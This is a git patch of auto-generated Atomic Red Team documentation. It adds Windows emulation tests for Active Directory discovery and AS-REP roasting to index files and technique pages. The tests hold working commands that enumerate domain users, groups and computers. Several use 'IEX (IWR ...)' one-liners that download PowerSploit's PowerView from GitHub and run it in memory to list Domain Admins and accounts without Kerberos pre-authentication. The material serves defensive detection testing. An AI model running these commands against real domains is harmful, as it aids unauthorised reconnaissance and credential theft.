From 4c019a8936126d8e36acc4c2af4b6ffc777a2f39 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 14 Mar 2022 16:44:03 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 6 + atomics/Indexes/Indexes-CSV/windows-index.csv | 6 + atomics/Indexes/Indexes-Markdown/index.md | 6 + .../Indexes/Indexes-Markdown/windows-index.md | 6 + atomics/Indexes/index.yaml | 103 ++++++++++++++++ atomics/T1018/T1018.md | 32 +++++ atomics/T1069.002/T1069.002.md | 115 ++++++++++++++++++ atomics/T1087.002/T1087.002.md | 32 +++++ atomics/T1558.004/T1558.004.md | 31 +++++ 9 files changed, 337 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0a6f7538..4e598d60 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell +credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh @@ -781,6 +782,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell +discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt @@ -789,6 +791,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt +discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell +discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell +discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell @@ -857,6 +862,7 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell +discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 25300732..2a0ede05 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1,5 +1,6 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell +credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt @@ -524,6 +525,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell +discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt @@ -532,6 +534,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt +discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell +discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell +discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell @@ -573,6 +578,7 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell +discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 253ca895..0c8c1184 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -8,6 +8,7 @@ - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md) - Atomic Test #1: Rubeus asreproast [windows] + - Atomic Test #2: Get-DomainUser with PowerView [windows] - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1282,6 +1283,7 @@ - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] + - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] @@ -1291,6 +1293,9 @@ - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows] - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows] - Atomic Test #8: Adfind - Query Active Directory Groups [windows] + - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows] + - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows] + - Atomic Test #11: Get-DomainGroupMember with PowerView [windows] - [T1482 Domain Trust Discovery](../../T1482/T1482.md) - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows] - Atomic Test #2: Windows - Discover domain trusts with nltest [windows] @@ -1374,6 +1379,7 @@ - Atomic Test #13: Remote System Discovery - ip route [linux] - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux] - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows] + - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows] - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #1: Security Software Discovery [windows] - Atomic Test #2: Security Software Discovery - powershell [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 5a6fc548..9aca2c0d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -3,6 +3,7 @@ - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md) - Atomic Test #1: Rubeus asreproast [windows] + - Atomic Test #2: Get-DomainUser with PowerView [windows] - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) @@ -906,6 +907,7 @@ - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] + - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] @@ -915,6 +917,9 @@ - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows] - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows] - Atomic Test #8: Adfind - Query Active Directory Groups [windows] + - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows] + - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows] + - Atomic Test #11: Get-DomainGroupMember with PowerView [windows] - [T1482 Domain Trust Discovery](../../T1482/T1482.md) - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows] - Atomic Test #2: Windows - Discover domain trusts with nltest [windows] @@ -971,6 +976,7 @@ - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows] - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows] - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows] + - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows] - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #1: Security Software Discovery [windows] - Atomic Test #2: Security Software Discovery - powershell [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 66dce2ee..32ccfe39 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -341,6 +341,20 @@ credential-access: ' name: powershell elevation_required: false + - name: Get-DomainUser with PowerView + auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a + description: 'Utilizing PowerView, run Get-DomainUser to identify domain users. + Upon execution, progress and info about users within the domain being scanned + will be displayed. + +' + supported_platforms: + - windows + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose + name: powershell T1552.003: technique: external_references: @@ -55087,6 +55101,18 @@ discovery: -Server #{domain} ' + - name: Enumerate Active Directory Users with ADSISearcher + auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3 + description: | + The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. + Upon successful execution a listing of users will output with their paths in AD. + Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne() T1069.002: technique: external_references: @@ -55280,6 +55306,71 @@ discovery: executor: command: "#{adfind_path} -f (objectcategory=group)\n" name: command_prompt + - name: Enumerate Active Directory Groups with ADSISearcher + auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0 + description: | + The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. + Upon successful execution a listing of groups will output with their paths in AD. + Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne() + +' + - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) + auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 + description: | + When successful, accounts that do not require kerberos pre-auth will be returned. + Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'Computer must be domain joined. + +' + prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) + {exit 0} else {exit 1} + +' + get_prereq_command: 'Write-Host Joining this computer to a domain must be + done manually. + +' + - description: 'Requires the Active Directory module for powershell to be installed. + +' + prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit + 0} else {exit 1} + +' + get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" + +' + executor: + name: powershell + elevation_required: false + command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties + useraccountcontrol | Format-Table name + +' + - name: Get-DomainGroupMember with PowerView + auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145 + description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain + users. Upon execution, progress and info about groups within the domain being + scanned will be displayed. + +' + supported_platforms: + - windows + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" + name: powershell T1482: technique: external_references: @@ -57521,6 +57612,18 @@ discovery: Write-Host $Computer} name: powershell elevation_required: false + - name: Enumerate Active Directory Computers with ADSISearcher + auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d + description: | + The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory. + Upon successful execution a listing of computers will output with their paths in AD. + Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne() T1518.001: technique: id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384 diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index cb53f87d..3055bdc6 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -36,6 +36,8 @@ Specific to macOS, the bonjour protocol exists to discover addition - [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher) +- [Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-16---enumerate-active-directory-computers-with-adsisearcher) +
@@ -634,4 +636,34 @@ write-host "This PC must be manually added to a domain." +
+
+ +## Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher +The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory. +Upon successful execution a listing of computers will output with their paths in AD. +Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne() +``` + + + + + +
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 478cf7a8..999930da 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -22,6 +22,12 @@ Commands such as net group /domain of the [Net](https://attack.mitr - [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups) +- [Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-9---enumerate-active-directory-groups-with-adsisearcher) + +- [Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-10---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting) + +- [Atomic Test #11 - Get-DomainGroupMember with PowerView](#atomic-test-11---get-domaingroupmember-with-powerview) +
@@ -308,4 +314,113 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste +
+
+ +## Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher +The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. +Upon successful execution a listing of groups will output with their paths in AD. +Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 9f4e344b-8434-41b3-85b1-d38f29d148d0 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne() +``` + + + + + + +
+
+ +## Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) +When successful, accounts that do not require kerberos pre-auth will be returned. +Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Computer must be domain joined. +##### Check Prereq Commands: +```powershell +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Write-Host Joining this computer to a domain must be done manually. +``` +##### Description: Requires the Active Directory module for powershell to be installed. +##### Check Prereq Commands: +```powershell +if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" +``` + + + + +
+
+ +## Atomic Test #11 - Get-DomainGroupMember with PowerView +Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 46352f40-f283-4fe5-b56d-d9a71750e145 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" +``` + + + + + +
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 254f6d75..55e4e2bd 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -26,6 +26,8 @@ Commands such as net user /domain and net group /domain @@ -441,4 +443,34 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { +
+
+ +## Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher +The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. +Upon successful execution a listing of users will output with their paths in AD. +Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 02e8be5a-3065-4e54-8cc8-a14d138834d3 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne() +``` + + + + + +
diff --git a/atomics/T1558.004/T1558.004.md b/atomics/T1558.004/T1558.004.md index 9d552e79..a294efbc 100644 --- a/atomics/T1558.004/T1558.004.md +++ b/atomics/T1558.004/T1558.004.md @@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003) - [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast) +- [Atomic Test #2 - Get-DomainUser with PowerView](#atomic-test-2---get-domainuser-with-powerview) +
@@ -76,4 +78,33 @@ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable +
+
+ +## Atomic Test #2 - Get-DomainUser with PowerView +Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d6139549-7b72-4e48-9ea1-324fc9bdf88a + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose +``` + + + + + +